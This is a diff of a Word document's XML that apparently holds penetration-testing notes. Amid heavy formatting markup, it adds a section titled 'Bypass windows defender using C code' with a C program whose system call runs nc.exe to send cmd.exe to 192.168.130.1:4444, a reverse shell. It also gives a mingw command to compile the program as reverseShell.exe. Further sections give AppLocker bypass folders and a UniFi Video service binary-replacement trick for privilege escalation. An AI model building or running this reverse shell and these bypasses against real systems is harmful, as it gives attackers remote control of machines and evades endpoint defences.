-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:b w:val="false"/>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
@@ -12098,58 +12829,15 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
+        <w:t>Bypass windows defender using C code</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Compile it for 64 bit </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>i686-w64-mingw32-g++ exploit.c -o reverseShell.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:b w:val="false"/>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
@@ -12176,19 +12864,19 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
+        <w:t>Write a simple code in c (exploit.c)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
           <w:i w:val="false"/>
           <w:iCs w:val="false"/>
           <w:color w:val="auto"/>
@@ -12197,14 +12885,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>App locker bypass</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12219,75 +12899,31 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">-Run command in </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="SourceText"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
           <w:i w:val="false"/>
           <w:iCs w:val="false"/>
           <w:color w:val="auto"/>
           <w:kern w:val="2"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">C:\Windows\Tasks </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PreformattedText"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PreformattedText"/>
-        <w:spacing w:before="0" w:after="283"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="SourceText"/>
-        </w:rPr>
-        <w:t xml:space="preserve">C:\Windows\Temp </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PreformattedText"/>
-        <w:spacing w:before="0" w:after="283"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="SourceText"/>
-        </w:rPr>
-        <w:t>Full documentation https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PreformattedText"/>
-        <w:spacing w:before="0" w:after="283"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
           <w:i w:val="false"/>
@@ -12296,22 +12932,22 @@
           <w:kern w:val="2"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>-powershell stop and start service</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PreformattedText"/>
-        <w:spacing w:before="0" w:after="283"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
+        <w:t>#include "stdlib.h"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
           <w:i w:val="false"/>
           <w:iCs w:val="false"/>
           <w:color w:val="auto"/>
@@ -12320,18 +12956,10 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>Stop-Service "Ubiquiti UniFi Video"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PreformattedText"/>
-        <w:spacing w:before="0" w:after="283"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
           <w:i w:val="false"/>
@@ -12342,29 +12970,462 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>do action (Ex replace taskkill.exe in C:\DataProgram\unifi-video)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="PreformattedText"/>
-        <w:spacing w:before="0" w:after="283"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
           <w:i w:val="false"/>
           <w:iCs w:val="false"/>
           <w:color w:val="auto"/>
           <w:kern w:val="2"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>Start-Service "Ubiquiti UniFi Video"</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>int main()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>system("nc.exe -e cmd.exe 192.168.130.1 4444");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>return 0;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Compile it for 64 bit </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>i686-w64-mingw32-g++ exploit.c -o reverseShell.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>App locker bypass</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-Run command in </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="SourceText"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">C:\Windows\Tasks </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PreformattedText"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
       </w:r>
     </w:p>
     <w:p>
@@ -12374,6 +13435,172 @@
         <w:rPr/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:rStyle w:val="SourceText"/>
+        </w:rPr>
+        <w:t xml:space="preserve">C:\Windows\Temp </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PreformattedText"/>
+        <w:spacing w:before="0" w:after="283"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="SourceText"/>
+        </w:rPr>
+        <w:t>Full documentation https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PreformattedText"/>
+        <w:spacing w:before="0" w:after="283"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>-powershell stop and start service</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PreformattedText"/>
+        <w:spacing w:before="0" w:after="283"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
